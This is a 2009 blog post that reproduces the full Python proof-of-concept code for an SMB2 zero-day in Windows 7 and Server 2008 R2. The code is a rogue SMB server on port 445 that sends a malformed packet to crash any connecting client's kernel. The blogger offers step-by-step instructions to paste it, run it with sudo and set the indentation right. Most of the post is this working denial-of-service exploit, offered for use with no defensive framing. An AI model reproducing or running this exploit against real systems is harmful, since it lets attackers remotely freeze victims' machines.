Thursday 19 November 2009

FULL CODE - Windows 7 Zero Day Exploit Proof of Concept Python Code

Here is the full code for the Windows 7 Zero Day Exploit involving SMB that was first posted here. Exploitation of this vulnerability occurs when a user attempts to browse to Windows Share hosted on the malicious server. On Windows 7, the DoS (denial of service) will occur as soon as you type ‘\\\' in the search box.

My code has fixes to ensure it will run first time. Simply copy and paste the code below into a file named "win7crash.py", and then make sure samba services are stopped ("sudo /etc/init.d/samba stop") and run "sudo python ./win7crash.py".

NOTE: Make sure the line def handle(self): is indented one space. The lines underneath this should be indented two spaces, and the last two lines not indented at all.

#!/bin/python
# This Python file uses the following encoding: utf-8
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

No comments: